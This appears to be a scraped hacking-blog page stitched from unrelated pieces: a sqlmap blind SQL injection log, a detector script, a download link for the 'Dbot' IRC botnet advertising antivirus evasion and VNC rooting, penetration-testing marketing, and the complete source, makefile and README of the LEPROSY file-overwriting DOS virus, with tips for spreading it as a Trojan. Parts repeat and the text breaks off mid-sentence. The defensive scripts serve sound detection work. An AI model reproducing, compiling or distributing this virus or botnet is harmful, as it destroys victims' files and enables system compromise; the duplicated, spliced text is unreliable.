[14:34:21] [INFO] testing PostgreSQL
[14:34:21] [INFO] query: COALESCE(5, NULL)
[14:34:21] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ASCII(SUBSTR((COALESCE(5, NULL)), 1, 1)) > 63
[14:34:23] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ASCII(SUBSTR((COALESCE(5, NULL)), 1, 1)) > 31
[14:34:25] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ASCII(SUBSTR((COALESCE(5, NULL)), 1, 1)) > 15
[14:34:27] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ASCII(SUBSTR((COALESCE(5, NULL)), 1, 1)) > 7
[14:34:29] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ASCII(SUBSTR((COALESCE(5, NULL)), 1, 1)) > 3
[14:34:32] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ASCII(SUBSTR((COALESCE(5, NULL)), 1, 1)) > 1
[14:34:34] [INFO] retrieved:
[14:34:34] [INFO] performed 6 queries in 12 seconds
[14:34:34] [WARNING] the remote DMBS is not PostgreSQL
[14:34:34] [INFO] testing Microsoft SQL Server
[14:34:34] [INFO] query: LTRIM(STR(LEN(1)))
[14:34:34] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ASCII(SUBSTRING((LTRIM(STR(LEN(1)))), 1, 1)) > 63
[14:34:36] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ASCII(SUBSTRING((LTRIM(STR(LEN(1)))), 1, 1)) > 31
[14:34:38] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ASCII(SUBSTRING((LTRIM(STR(LEN(1)))), 1, 1)) > 47
[14:34:41] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ASCII(SUBSTRING((LTRIM(STR(LEN(1)))), 1, 1)) > 55
[14:34:43] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ASCII(SUBSTRING((LTRIM(STR(LEN(1)))), 1, 1)) > 51
[14:34:45] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ASCII(SUBSTRING((LTRIM(STR(LEN(1)))), 1, 1)) > 49
[14:34:46] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ASCII(SUBSTRING((LTRIM(STR(LEN(1)))), 1, 1)) > 48
[14:34:48] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ASCII(SUBSTRING((LTRIM(STR(LEN(1)))), 2, 1)) > 63
[14:34:50] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ASCII(SUBSTRING((LTRIM(STR(LEN(1)))), 2, 1)) > 31
[14:34:53] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ASCII(SUBSTRING((LTRIM(STR(LEN(1)))), 2, 1)) > 15
[14:34:55] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ASCII(SUBSTRING((LTRIM(STR(LEN(1)))), 2, 1)) > 7
[14:34:57] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ASCII(SUBSTRING((LTRIM(STR(LEN(1)))), 2, 1)) > 3
[14:35:00] [DEBUG] request:http://localhost/vuln.asp?i=6 AND ASCII(SUBSTRING((LTRIM(STR(LEN(1)))), 2, 1)) > 1
[14:35:03] [INFO] retrieved: 1
[14:35:03] [INFO] performed 13 queries in 28 seconds
remote DBMS: Microsoft SQL Server
The process above is discussed in the paper released by Secforce.
Sqlmap retrieved the database banner/version in approx. 60 seconds.
Blind SQL Injection shell took 80 seconds, because it retrieves all the characters one by one and can therefore retrieve any kind of banner with 100% precision, while sqlmap only needs to match a few characters against its default banners.
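Seen from the web server's side, the halving thresholds in the dump above (63, 31, 47, 55, ...) are a recognisable signature in access logs. The following detector is an added example, not part of the original post or of sqlmap; the log lines, IP addresses and function names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import quote, unquote_plus, urlsplit

# Common Log Format: client, identity, user, [time], "METHOD target PROTO", ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*"')

# ASCII(SUBSTRING(<expr>, <pos>, 1)) > <threshold>, plus the ORD/MID and
# SUBSTR spellings that appear in the console dump above.
PROBE_RE = re.compile(
    r"\b(?:ASCII|ORD)\s*\(\s*(?:SUBSTRING|SUBSTR|MID)\s*\((.+),"
    r"\s*(\d+)\s*,\s*1\s*\)\s*\)\s*>\s*(\d+)",
    re.IGNORECASE,
)


def make_line(client, clock, param_value):
    """Build one constructed access-log line for the sample below."""
    target = "/vuln.asp?i=" + quote(param_value, safe="(),")
    return f'{client} - - [20/Jun/2008:{clock} +0000] "GET {target} HTTP/1.1" 200 512'


def probe(pos, threshold):
    """Parameter value shaped like the MS SQL Server requests in the dump."""
    return f"6 AND ASCII(SUBSTRING((LTRIM(STR(LEN(1)))), {pos}, 1)) > {threshold}"


# Constructed sample log (documentation IP ranges), modelled on the dump above.
SAMPLE_LOG = (
    [make_line("198.51.100.7", "14:30:01", "6"),
     make_line("198.51.100.7", "14:30:09", "47")]
    + [make_line("192.0.2.10", f"14:34:{34 + 2 * n:02d}", probe(1, t))
       for n, t in enumerate([63, 31, 47, 55, 51, 49, 48])]
    + [make_line("192.0.2.10", f"14:34:{50 + 2 * n:02d}", probe(2, t))
       for n, t in enumerate([63, 31, 15])]
    + ['198.51.100.7 - - [20/Jun/2008:14:36:00 +0000] '
       '"GET /search.asp?q=ascii+table HTTP/1.1" 200 900']
)


def is_bisection(thresholds, min_steps=5):
    """True if successive thresholds move by steps that halve each time."""
    if len(thresholds) < min_steps:
        return False
    diffs = [abs(b - a) for a, b in zip(thresholds, thresholds[1:])]
    if any(d == 0 for d in diffs):
        return False  # repeated identical requests are not a search
    # Allow an off-by-one for integer rounding of the midpoint.
    return all(abs(2 * nxt - cur) <= 1 for cur, nxt in zip(diffs, diffs[1:]))


def detect_blind_sqli(lines, min_steps=5):
    """Group comparison probes per client, path, expression and character
    position, and report the groups whose thresholds form a binary search."""
    probes = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        parts = urlsplit(target)
        hit = PROBE_RE.search(unquote_plus(parts.query))
        if hit:
            expr, pos, threshold = hit.groups()
            key = (client, parts.path, expr.strip(), int(pos))
            probes[key].append(int(threshold))
    findings = []
    for (client, path, expr, pos), thresholds in probes.items():
        if is_bisection(thresholds, min_steps):
            findings.append({"client": client, "path": path, "expression": expr,
                             "position": pos, "thresholds": thresholds})
    return findings


if __name__ == "__main__":
    for f in detect_blind_sqli(SAMPLE_LOG):
        print(f"{f['client']} bisecting char {f['position']} of "
              f"{f['expression']} via {f['path']}: {f['thresholds']}")
```

Detection of this kind only shortens the time to response; the fix for the injectable parameter itself is a parameterized query.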
Dbot v3.0
- stable irc bot
- multicommand topic parsing
- multicommand chat parsing
- irc connection timeout
- unlimited number of irc servers
- xor encoded strings (antivirus anti-heuristic)
- md5 protected important commands (download, remove) - if the command is
long enough, NO ONE can steal your bots
- copy to 3 different possible locations, but not windows or system32 dir
- registry startup
- win xp sp2 firewall bypass
- anti-sandbox
- multithreaded ftpd
- cftp supported
- ability to change cftp parameters while bot is running
- scanner:
* distinguishes wan and lan bots; e.g. lan bots using cftp, wan using ftp
* ability to use ftp or cftp
* multithreaded scanning
* every single thread checks for all ports (less threads needed for
more exploits)
* random or sequential scan
* ability to define range for lan bots to scan
- anti-botkiller protection with nulling all expired strings, copying to
alternative locations instead of windows or system32 dir
- tcpip.sys patcher (ver 1&2)
- botkiller
VNC Password Scanner + Universal VNC rooter :
- finds authbypass, no passworded and passworded vncs
- user defined wordlist
- every RFB3.8 server is checked for authbypass exploit first; if it fails, the
scanner switches to password checking
- 99,9% accurate scanner, at the time of scanning ALL vncs work!
- alternative VNC rooting via task manager (universal for all languages)
that works on win2000 and win xp
- reporting to irc: vnc version, desktop name, ip and password
- myvnc password reporting
Download:
http://www.darksun.ws/download/uploads/Bots/Dbot.v3.1.rar
Thursday, June 19, 2008
A Compression Tool -kGB archiver
A Compression Tool
Also Supports zip , rar , kgb files
High Compression Ratio
File Size - 1.3 MB
Download Link -
http://rapidshare.com/files/90745460/KGB_Archiver.rar
On-Site Security Assessment
Internal on-site penetration testing gives the business the assurance it needs to conduct business safely on the internet and with business partners.
Internal assessments use a similar methodology to an external assessment, however the engagement will occur from within the WAN at each logical management zone, physical segment or simply attached to the DMZ.
To attach to an internal network requires a significant depth of knowledge in many areas. These areas are not limited to Policy, Architecture, Implementation and Auditing across multiple business units, operating systems and devices. Pure Hacking has all of these skill sets.
With most internal assessments, Pure Hacking has discovered for its clients significant business risks that would cease business operations within hours. 20% of the remedial work for these clients gives them 80% of their security effectiveness and as such, the advice guards against network security attacks. The advice is independent of any vendor, and is often accomplished through our clients' existing partners.
From an internal assessment, our clients gain more business value if part or all of their operations are outsourced. The recommendations given will be independent of any supplier or vendor, and as such, the current supplier can remedy the situation without further cost. The net results - our clients are safe and get a greater R.O.I from their outsourced partners and the outsourced partners gain specialized security intellectual property.
External Penetration Testing
What is an External Penetration Test?
This test focuses on
* server penetration testing
* router penetration testing
* firewall penetration testing
* operating system installation and maintenance.
The penetration test may be performed with no disclosure or full disclosure of the environment in question.
The engagement would start with publicly accessible information about the client, followed by network enumeration.
Network enumeration allows Pure Hacking to target hosts, and specific network security attacks. Pure Hacking would then assess the open ports, services and specific security vulnerabilities, and use that information to gain a toehold into the environment. After a toehold is established, escalation of privilege occurs until the external environment is controlled.
What do you get at the end of the engagement?
Depending on the scope of work, a typical report would include any or all of these components (reference: OSSTMM):
Network Security
* Network Surveying
* Port Scanning
* System Identification
* Services Identification
* Vulnerability Research & Verification
* Application Testing & Code Review
* Router Testing
* Firewall Testing
* Intrusion Detection System Testing
* Trusted Systems Testing
* Password Cracking
* Denial of Service Testing
* Containment Measures Testing
Social Engineering
* Request Testing
* Guided Suggestion Testing
* Trust Testing
Wireless Security
* Wireless Networks Testing
* Cordless Communications Testing
* Privacy Review
* Infrared Systems Testing
Communications Security
* PBX Testing
* Voicemail Testing
* FAX review
* Modem Testing
Physical Security
* Access Controls Testing
* Perimeter Review
* Monitoring Review
* Alarm Response Testing
* Location Review
* Environment Review
Why Pure Hacking
* The only dedicated Penetration Testing company, with a history of industry leadership in Internet Security designed to keep your mission critical systems safe.
* The discovery of real risks and solutions independent of any vendor
* Skills transfer for your staff as Pure Hacking will divulge all intellectual property and tools when Pure Hacking operates with you.
* A worldwide operation, so regardless of the size or location of your network, Pure Hacking will service your need.
* A flexible company that will work within your operational parameters.
At Pure Hacking, an external network security attack is the most common request from our clients. Every day of the week we are performing these engagements and as such, our skill set is efficient and effective. As we are performing penetration tests on a daily basis, we are the industry experts.
We are so confident with the service we offer, we guarantee our work to our client's level of satisfaction and keep continual contact at their requests. Our clients continue to use us because we are trustworthy, knowledgeable and exceptional value.
source code for leprosy_c.c
; 'Extra-Tiny' memory model startup code for Turbo C 2.0
;
; This makes smaller executable images from C programs, by
; removing code to get command line arguments and the like.
; Compile with Tiny model flag, do not use any standard I/O
; library functions, such as puts() or int86().
;
; This code courtesy PC Magazine, December 26, 1989.
; But nobody really needs to know that.
_text segment byte public 'code'
_text ends
_data segment word public 'data'
_data ends
_bss segment word public 'bss'
_bss ends
dgroup group _text, _data, _bss
_text segment
org 100h
begin:
_text ends
end begin
=============================
/* C Code starts here!
This file is part of the source code to the LEPROSY Virus 1.00
Copy-ya-right (c) 1990 by PCM2. This program can cause destruction
of files; you're warned, the author assumes no responsibility
for damage this program causes, incidental or otherwise. This
program is not intended for general distribution -- irresponsible
users should not be allowed access to this program, or its
accompanying files. (Unlike people like us, of course...)
*/
#pragma inline
#define CRLF "\x17\x14" /* CR/LF combo encrypted. */
#define NO_MATCH 0x12 /* No match in wildcard search. */
/* The following strings are not garbled; they are all encrypted */
/* using the simple technique of adding the integer value 10 to */
/* each character. They are automatically decrypted by */
/* 'print_s()', the function which sends the strings to 'stdout' */
/* using DOS service 09H. All are terminated with a dollar-sign */
/* "$" as per DOS service specifications. */
char fake_msg[] = CRLF "Z|yq|kw*~yy*lsq*~y*ps~*sx*wowy|\x83.";
char *virus_msg[3] =
{
CRLF "\x13XOa]*PVK]R++**cy\x7f|*}\x83}~ow*rk}*loox*sxpom~on*\x81s~r*~ro.",
CRLF "\x13sxm\x7f|klvo*nomk\x83*yp*VOZ\\Y]c*;8::6*k*\x80s|\x7f}*sx\x80ox~on*l\x83.",
CRLF "\x13ZMW<*sx*T\x7fxo*yp*;CC:8**Qyyn*v\x7fmu+\x17\x14."
};
struct _dta /* Disk Transfer Area format for find. */
{
char findnext[21];
char attribute;
int timestamp;
int datestamp;
long filesize;
char filename[13];
} *dta = (struct _dta *) 0x80; /* Set it to default DTA. */
const char filler[] = "XX"; /* Pad file length to 666 bytes. */
const char *codestart = (char *) 0x100; /* Memory where virus code begins. */
const int virus_size = 666; /* The size in bytes of the virus code. */
const int infection_rate = 4; /* How many files to infect per run. */
char compare_buf[20]; /* Load program here to test infection. */
int handle; /* The current file handle being used. */
int datestamp, timestamp; /* Store original date and time here. */
char diseased_count = 0; /* How many infected files found so far. */
char success = 0; /* How many infected this run. */
/* The following are function prototypes, in keeping with ANSI */
/* Standard C, for the support functions of this program. */
int find_first( char *fn );
int find_healthy( void );
int find_next( void );
int healthy( void );
void infect( void );
void close_handle( void );
void open_handle( char *fn );
void print_s( char *s );
void restore_timestamp( void );
/*----------------------------------*/
/* M A I N P R O G R A M */
/*----------------------------------*/
int main( void ) {
int x = 0;
do {
if ( find_healthy() ) { /* Is there an un-infected file? */
infect(); /* Well, then infect it! */
x++; /* Add one to the counter. */
success++; /* Carve a notch in our belt. */
}
else { /* If there ain't a file here... */
_DX = (int) ".."; /* See if we can step back to */
_AH = 0x3b; /* the parent directory, and try */
asm int 21H; /* there. */
x++; /* Increment the counter anyway, to */
} /* avoid infinite loops. */
} while( x < infection_rate ); /* Do this until we've had enough. */
if ( success ) /* If we got something this time, */
print_s( fake_msg ); /* feed 'em the phony error line. */
else
if ( diseased_count > 6 ) /* If we found 6+ infected files */
for( x = 0; x < 3; x++ ) /* along the way, laugh!! */
print_s( virus_msg[x] );
else
print_s( fake_msg ); /* Otherwise, keep a low profile. */
return;
}
void infect( void ) {
_DX = (int) dta->filename; /* DX register points to filename. */
_CX = 0x00; /* No attribute flags are set. */
_AL = 0x01; /* Use Set Attribute sub-function. */
_AH = 0x43; /* Assure access to write file. */
asm int 21H; /* Call DOS interrupt. */
open_handle( dta->filename ); /* Re-open the healthy file. */
_BX = handle; /* BX register holds handle. */
_CX = virus_size; /* Number of bytes to write. */
_DX = (int) codestart; /* Write program code. */
_AH = 0x40; /* Set up and call DOS. */
asm int 21H;
restore_timestamp(); /* Keep original date & time. */
close_handle(); /* Close file. */
return;
}
int find_healthy( void ) {
if ( find_first("*.EXE") != NO_MATCH ) /* Find EXE? */
if ( healthy() ) /* If it's healthy, OK! */
return 1;
else
while ( find_next() != NO_MATCH ) /* Try a few more otherwise. */
if ( healthy() )
return 1; /* If you find one, great! */
if ( find_first("*.COM") != NO_MATCH ) /* Find COM? */
if ( healthy() ) /* If it's healthy, OK! */
return 1;
else
while ( find_next() != NO_MATCH ) /* Try a few more otherwise. */
if ( healthy() )
return 1; /* If you find one, great! */
return 0; /* Otherwise, say so. */
}
int healthy( void ) {
int i;
datestamp = dta->datestamp; /* Save time & date for later. */
timestamp = dta->timestamp;
open_handle( dta->filename ); /* Open last file located. */
_BX = handle; /* BX holds current file handle. */
_CX = 20; /* We only want a few bytes. */
_DX = (int) compare_buf; /* DX points to the scratch buffer. */
_AH = 0x3f; /* Read in file for comparison. */
asm int 21H;
restore_timestamp(); /* Keep original date & time. */
close_handle(); /* Close the file. */
for ( i = 0; i < 20; i++ ) /* Compare to virus code. */
if ( compare_buf[i] != *(codestart+i) )
return 1; /* If no match, return healthy. */
diseased_count++; /* Chalk up one more fucked file. */
return 0; /* Otherwise, return infected. */
}
void restore_timestamp( void ) {
_AL = 0x01; /* Keep original date & time. */
_BX = handle; /* Same file handle. */
_CX = timestamp; /* Get time & date from DTA. */
_DX = datestamp;
_AH = 0x57; /* Do DOS service. */
asm int 21H;
return;
}
void print_s( char *s ) {
char *p = s;
while ( *p ) { /* Subtract 10 from every character. */
*p -= 10;
p++;
}
_DX = (int) s; /* Set DX to point to adjusted string. */
_AH = 0x09; /* Set DOS function number. */
asm int 21H; /* Call DOS interrupt. */
return;
}
int find_first( char *fn ) {
_DX = (int) fn; /* Point DX to the file name. */
_CX = 0xff; /* Search for all attributes. */
_AH = 0x4e; /* 'Find first' DOS service. */
asm int 21H; /* Go, DOS, go. */
return _AX; /* Return possible error code. */
}
int find_next( void ) {
_AH = 0x4f; /* 'Find next' function. */
asm int 21H; /* Call DOS. */
return _AX; /* Return any error code. */
}
void open_handle( char *fn ) {
_DX = (int) fn; /* Point DX to the filename. */
_AL = 0x02; /* Always open for both read & write. */
_AH = 0x3d; /* "Open handle" service. */
asm int 21H; /* Call DOS. */
handle = _AX; /* Assume handle returned OK. */
return;
}
void close_handle( void ) {
_BX = handle; /* Load BX register w/current file handle. */
_AH = 0x3e; /* Set up and call DOS service. */
asm int 21H;
return;
}
L E P R O S Y 1 . 0 0
A Virus for MS-DOS Systems.
Copy-ya-right (c) June 29, 1990 by PCM2
GENERAL SUMMARY
~~~~~~~~~~~~~~~
LEPROSY is a virus which can influence PC and PC clone
systems running MS-DOS or PC-DOS version 2.0 or later. It may
be characterized as an overwriting, non-resident .COM and .EXE
infecting virus, similar in operation to the AIDS Virus by
Doctor Dissector and CPI; in fact, the AIDS Virus was actually
the inspiration for this program, though Leprosy is in no way a
re-write or mod of the AIDS Virus, it is an entirely new
program.
The way both Leprosy and the AIDS Virus (and Number One,
the ancestor of AIDS) work is fairly simple. Upon executing the
virus program, the virus runs a search for executable files
which it can affect. It does this by doing a general scan for
all files with a .COM or .EXE extension, then, having found such
a file, it loads in part of that file's code to compare it with
the virus' own code, to make sure the file found hasn't already
been infected. If it hasn't, the virus proceeds to write itself
OVER the code of the executable file found. The executable file
now ceases to perform its original function. When the
unsuspecting user runs the file, he will instead be running
another copy of the virus, which will seek out another
executable file to infect, and so on. The executable files
which are infected by the virus in this manner are permanently
destroyed. While this is a primitive way to spread a virus, it
is actually pretty effective, if you consider that by the time
the user discovers a file which has been infected by the virus,
it has already gone and zapped one or more other files, and by
the time the user finds those files, they will have infected a
few more, and on until the user figures out some way to detect
and eradicate all the infected files.
While Leprosy is similar in operation to the AIDS Virus, it
presents several important advantages over AIDS:
1. CARRIERS: The AIDS Virus will only infect .COM files.
Leprosy is not limited in this way; it will infect both .COM
files and the more common .EXE files, going for .EXE files first.
2. FILE SIZE: The AIDS Virus is written in Pascal, and is about
13K in size. Considering that any file that is infected which
was originally smaller than the virus itself will expand to the
size of the virus when it is infected, and that many .COM files
will be smaller than 13K, quite often a file will show a
noticeable change in size when infected by the AIDS Virus.
Leprosy is only a mere 666 bytes in size; therefore, changes in
file size will be much less frequent, and the disk access time
it takes to infect a new file will be considerably shorter than
when using the AIDS Virus.
3. DUMBSHIT FACTOR: When the AIDS Virus infects a file or fails
to find any non-infected files, it just sits there or hangs up
the system. Leprosy takes a more subtle approach, however.
When Leprosy has infected some files successfully, it prints out
the message "Program too big to fit in memory". This way,
dumbshits might think there is something screwy with their RAMs
or TSRs, and may end up running the same virus-infected file one
or more times before they get a clue.
4. CONCEALMENT: To find out if a file has been infected by the
AIDS Virus, all you need to do is run a hex editor on the file
and look for the full screen reading "AIDS" in the code. Once
again, Leprosy makes it more difficult on the dumbshit user.
All the strings Leprosy outputs to the screen are encrypted in a
simple way, enough to make it impossible to quickly spot
suspicious phrases when running a hex editor on an infected
file. What is more, Leprosy will not change the time/date stamp
on the file when it infects it, unlike AIDS.
5. COMMUNICABILITY: When the AIDS Virus fails to locate any
non-infected .COM file in the current directory, it can no
longer spread itself. The only way an AIDS Virus can spread
from one directory to another is to somehow make it into one of
the directories in the current PATH, and be called by the user
from a different directory. Leprosy gives itself one more
shot. When it fails to find any more non-infected files in the
current directory, it will step back into the parent directory,
and try to find some files again there. While when the virus
exits the current directory will have changed when Leprosy does
this, hopefully the dumbshit won't catch on. The payback is
that Leprosy might eventually creep up to the root directory and
infect COMMAND.COM, and then the user will be fucked over.
6. RATE OF TRANSMISSION: The AIDS Virus will only infect one
file at a time. Leprosy will infect up to four files each time
it is run.
SETTING UP LEPROSY ON A SYSTEM
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
To install Leprosy onto an un-infected system, all you need
do is run the provided file, LEPROSY.COM, somewhere on that
system, preferably somewhere where it will have access to a lot
of commonly used executables. Alternately, you could infect
some program with an impressive-looking file length and
documentation and send it to someone as a Trojan Horse type
program. Just make sure it gets run.
COMPILING LEPROSY
~~~~~~~~~~~~~~~~~
To assemble the Leprosy .COM file, you will need Turbo C
2.0 and Turbo Assembler. MASM might work, just as long as the
executable file turns out the appropriate length. If the .COM
file doesn't come out to exactly 666 bytes long, then it might
not work properly. C compilers other than Turbo C will probably
not work, since the program makes extensive use of inline
assembler, but versions other than 2.0 will probably be okay.
Just remember -- watch the file length.
The easiest way to re-create Leprosy is to just run MAKE,
and the provided makefile will handle the rest. If you are
compiling it by hand, you should use this makefile as your
guidelines. An important note is that you should not link the
program with the standard Turbo C startup code for the Tiny
memory model; instead, always link it with the provided
alternate startup code. This file, C0T.ASM, is a startup
sequence which gets rid of code to gather command line arguments
and the like, allowing for programs which are essentially as
small as their assembly language counterparts. Just remember,
keep an eye on the executable file size.
WAYS TO SPOT THE VIRUS
~~~~~~~~~~~~~~~~~~~~~~
There are several ways to notice the Leprosy virus on your
system. If small .COM files are increasing in length to 666
bytes, that's your first hint. 666 bytes isn't a very likely
file length, but it's funny, so I'm keeping it that way. Also,
if the current directory changes when you run a program, or you
notice strange "Program too big to fit in memory" errors, that
should tip you off too. Leprosy can also be detected by CRC
checking programs, because it directly modifies the contents of
the files it infects. What is more, Leprosy causes a
distinctive drive noise, sort of a "blickablickablickablicka" on
my hard drive, because it is opening, reading from, writing to,
and closing a number of files very quickly.
ACKNOWLEDGEMENTS
~~~~~~~~~~~~~~~~
I'd like to thank some of the pirate boards in the (415)
area code -- they know who they are.
What is more, I'd like to say that I used the December 26,
1989 issue of PC Magazine, and the book "The NEW Peter Norton
Programmer's Guide to the IBM PC and PS/2" in the process of
writing the Leprosy program. I just thought I'd mention that,
since it kind of makes me laugh to wonder what Peter Norton and
PC Magazine would think if they knew they were partly
responsible for the creation of a virus. HAHA!
Yours truly,
PCM2
P.S. BTW, if Leprosy fails to find any .EXE or .COM files that
aren't infected, but it locates more than 6 executable
files that are already infected with Leprosy, it displays a
message indicating that the system has been infected with
Leprosy, and wishes the user luck. If it can't find any
new files to infect, and only finds 6 or less infected
files during its entire run, it just prints out the fake
"Program too big to fit in memory" message again.
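The indicators named under WAYS TO SPOT THE VIRUS (666-byte files, CRC changes, the encoded "Program too big to fit in memory" string) can be checked mechanically. The triage sketch below is an added example, not part of the Leprosy package or of this page's original text; the sample buffers and the 20-byte head marker are constructed placeholders (no real virus bytes), and the sweep over all single-byte additive shifts goes beyond the fixed shift of 10 the source uses.

```python
"""Defensive triage for the indicators the README lists (added example)."""
import zlib

SHIFT = 10         # source comment: 10 is added to every character
VIRUS_SIZE = 666   # README: files smaller than the virus grow to 666 bytes
HEAD_LEN = 20      # the source's healthy() compares the first 20 bytes
# Plaintext the README says is printed; DOS service 09h strings end in '$'.
FAKE_MSG = b"\r\nProgram too big to fit in memory$"


def encode(data, shift=SHIFT):
    """Apply the additive encoding described in the source comment."""
    return bytes((b + shift) & 0xFF for b in data)


def decode(data, shift=SHIFT):
    """Undo the encoding, as print_s() does before calling DOS."""
    return bytes((b - shift) & 0xFF for b in data)


def find_shifted(data, plaintext=FAKE_MSG):
    """Return (offset, shift) for every non-zero additive shift under
    which `plaintext` occurs in `data`. Shift 0 is skipped on purpose:
    the plain message is a normal DOS error text and not an indicator."""
    hits = []
    for shift in range(1, 256):
        off = data.find(encode(plaintext, shift))
        if off != -1:
            hits.append((off, shift))
    return hits


def triage(data, baseline_crc=None, known_head=None):
    """List which of the README's indicators `data` exhibits.

    baseline_crc: CRC-32 recorded while the file was known good.
    known_head:   leading bytes of a confirmed infected file. An
                  overwriting infector puts the same bytes at the start
                  of every victim, so they work as a signature.
    """
    reasons = []
    # Timestamps are restored by the virus, so only content checks help.
    if baseline_crc is not None and zlib.crc32(data) != baseline_crc:
        reasons.append("crc-mismatch")
    if known_head is not None and data[:HEAD_LEN] == known_head[:HEAD_LEN]:
        reasons.append("shared-head")
    # Size only helps for files that were smaller than the virus.
    if len(data) == VIRUS_SIZE:
        reasons.append("size-666")
    for off, shift in find_shifted(data):
        reasons.append(f"encoded-msg offset={off} shift={shift}")
    return reasons


def build_samples():
    """Constructed stand-ins for clean and overwritten files."""
    head = bytes(range(0x40, 0x40 + HEAD_LEN))      # placeholder signature
    body = head + encode(FAKE_MSG)
    small = body + b"\x00" * (VIRUS_SIZE - len(body))  # victim grew to 666
    original = b"\x90" * 1666                       # large file, known good
    large = small + original[VIRUS_SIZE:]           # first 666 bytes replaced
    clean = b"\x90" * 100 + FAKE_MSG                # plain message only
    return {"head": head, "small": small, "original": original,
            "large": large, "clean": clean}


if __name__ == "__main__":
    s = build_samples()
    base = zlib.crc32(s["original"])
    print("small:", triage(s["small"], known_head=s["head"]))
    print("large:", triage(s["large"], base, s["head"]))
    print("clean:", triage(s["clean"], known_head=s["head"]))
```

The large sample keeps its original length, so the size check stays silent there and only the CRC baseline, the shared leading bytes and the encoded string flag it.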
# makefile for LEPROSY Virus 1.00 by PCM2
leprosy.com: leprosy.obj c0t.obj
tlink /x /t c0t+leprosy,leprosy,,
c0t.obj: c0t.asm
tasm c0t
leprosy.obj: leprosy.asm
tasm leprosy
leprosy.asm: leprosy.c
tcc -mt -f- -K -S leprosy
void print_s( char *s ) {
char *p = s;
while ( *p ) { /* Subtract 10 from every character. */
*p -= 10;
p++;
}
_DX = (int) s; /* Set DX to point to adjusted string. */
_AH = 0x09; /* Set DOS function number. */
asm int 21H; /* Call DOS interrupt. */
return;
}
int find_first( char *fn ) {
_DX = (int) fn; /* Point DX to the file name. */
_CX = 0xff; /* Search for all attributes. */
_AH = 0x4e; /* 'Find first' DOS service. */
asm int 21H; /* Go, DOS, go. */
return _AX; /* Return possible error code. */
}
int find_next( void ) {
_AH = 0x4f; /* 'Find next' function. */
asm int 21H; /* Call DOS. */
return _AX; /* Return any error code. */
}
void open_handle( char *fn ) {
_DX = (int) fn; /* Point DX to the filename. */
_AL = 0x02; /* Always open for both read & write. */
_AH = 0x3d; /* "Open handle" service. */
asm int 21H; /* Call DOS. */
handle = _AX; /* Assume handle returned OK. */
return;
}
void close_handle( void ) {
_BX = handle; /* Load BX register w/current file handle. */
_AH = 0x3e; /* Set up and call DOS service. */
asm int 21H;
return;
}
L E P R O S Y 1 . 0 0
A Virus for MS-DOS Systems.
Copy-ya-right (c) June 29, 1990 by PCM2
GENERAL SUMMARY
~~~~~~~~~~~~~~~
LEPROSY is a virus which can influence PC and PC clone
systems running MS-DOS or PC-DOS version 2.0 or later. It may
be characterized as an overwriting, non-resident .COM and .EXE
infecting virus, similar in operation to the AIDS Virus by
Doctor Dissector and CPI; in fact, the AIDS Virus was actually
the inspiration for this program, though Leprosy is in no way a
re-write or mod of the AIDS Virus; it is an entirely new
program.
The way both Leprosy and the AIDS Virus (and Number One,
the ancestor of AIDS) work is fairly simple. Upon executing the
virus program, the virus runs a search for executable files
which it can affect. It does this by doing a general scan for
all files with a .COM or .EXE extension, then, having found such
a file, it loads in part of that file's code to compare it with
the virus' own code, to make sure the file found hasn't already
been infected. If it hasn't, the virus proceeds to write itself
OVER the code of the executable file found. The executable file
now ceases to perform its original function. When the
unsuspecting user runs the file, he will instead be running
another copy of the virus, which will seek out another
executable file to infect, and so on. The executable files
which are infected by the virus in this manner are permanently
destroyed. While this is a primitive way to spread a virus, it
is actually pretty effective, if you consider that by the time
the user discovers a file which has been infected by the virus,
it has already gone and zapped one or more other files, and by
the time the user finds those files, they will have infected a
few more, and on until the user figures out some way to detect
and eradicate all the infected files.
While Leprosy is similar in operation to the AIDS Virus, it
presents several important advantages over AIDS:
1. CARRIERS: The AIDS Virus will only infect .COM files.
Leprosy is not limited in this way; it will infect both .COM
files and the more common .EXE files, going for .EXE files first.
2. FILE SIZE: The AIDS Virus is written in Pascal, and is about
13K in size. Considering that any file that is infected which
was originally smaller than the virus itself will expand to the
size of the virus when it is infected, and that many .COM files
will be smaller than 13K, quite often a file will show a
noticeable change in size when infected by the AIDS Virus.
Leprosy is only a mere 666 bytes in size; therefore, changes in
file size will be much less frequent, and the disk access time
it takes to infect a new file will be considerably shorter than
when using the AIDS Virus.
3. DUMBSHIT FACTOR: When the AIDS Virus infects a file or fails
to find any non-infected files, it just sits there or hangs up
the system. Leprosy takes a more subtle approach, however.
When Leprosy has infected some files successfully, it prints out
the message "Program too big to fit in memory". This way,
dumbshits might think there is something screwy with their RAMs
or TSRs, and may end up running the same virus-infected file one
or more times before they get a clue.
4. CONCEALMENT: To find out if a file has been infected by the
AIDS Virus, all you need to do is run a hex editor on the file
and look for the full screen reading "AIDS" in the code. Once
again, Leprosy makes it more difficult on the dumbshit user.
All the strings Leprosy outputs to the screen are encrypted in a
simple way, enough to make it impossible to quickly spot
suspicious phrases when running a hex editor on an infected
file. What is more, Leprosy will not change the time/date stamp
on the file when it infects it, unlike AIDS.
5. COMMUNICABILITY: When the AIDS Virus fails to locate any
non-infected .COM file in the current directory, it can no
longer spread itself. The only way an AIDS Virus can spread
from one directory to another is to somehow make it into one of
the directories in the current PATH, and be called by the user
from a different directory. Leprosy gives itself one more
